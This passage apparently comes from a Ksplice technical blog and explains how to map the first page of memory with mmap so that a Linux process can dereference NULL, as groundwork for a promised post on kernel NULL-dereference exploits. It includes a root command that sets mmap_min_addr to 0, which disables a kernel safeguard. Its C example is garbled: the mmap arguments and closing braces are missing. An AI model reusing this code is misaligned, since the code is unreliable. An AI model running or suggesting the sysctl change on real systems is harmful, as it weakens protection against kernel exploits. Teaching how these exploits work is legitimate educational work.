If we just want to be able to read and write the NULL pointer, we'll want to set addr to 0 and length to 4096, in order to map the first page of memory. We'll need PROT_READ and PROT_WRITE to be able to read and write, and all three of the flags I mentioned. fd and offset are irrelevant; we'll set them to -1 and 0 respectively.

Putting it all together, we get the following short C program, which successfully reads and writes through a NULL pointer without crashing!

(Note that most modern systems actually specifically disallow mapping the NULL page, out of security concerns. To run the following example on a recent Linux machine at home, you'll need to run # echo 0 > /proc/sys/vm/mmap_min_addr as root, first.)

#include <sys/mman.h>
#include <stdio.h>

int main() {
  int *ptr = NULL;
  if (mmap(0, 4096, PROT_READ|PROT_WRITE,
      == MAP_FAILED) {
    perror("Unable to mmap(NULL)");
    fprintf(stderr, "Is /proc/sys/vm/mmap_min_addr non-zero?\n");
    return 1;
  printf("Dereferencing my NULL pointer yields: %d\n", *ptr);
  *ptr = 17;
  printf("Now it's: %d\n", *ptr);
  return 0;

Next time, we'll look at how a process can not only map NULL in its own address space, but can also create mappings in the kernel's address space. And, I'll show you how this lets an attacker use a NULL dereference in the kernel to take over the entire machine. Stay tuned!



Tired of rebooting to update systems? So are we -- which is why we invented Ksplice, technology that lets you update the Linux kernel without rebooting. It's currently available as part of Oracle Linux Premier Support, Fedora, and Ubuntu desktop. This blog is our place to ramble about technical topics that we (and hopefully you) think are interesting.


« July 2016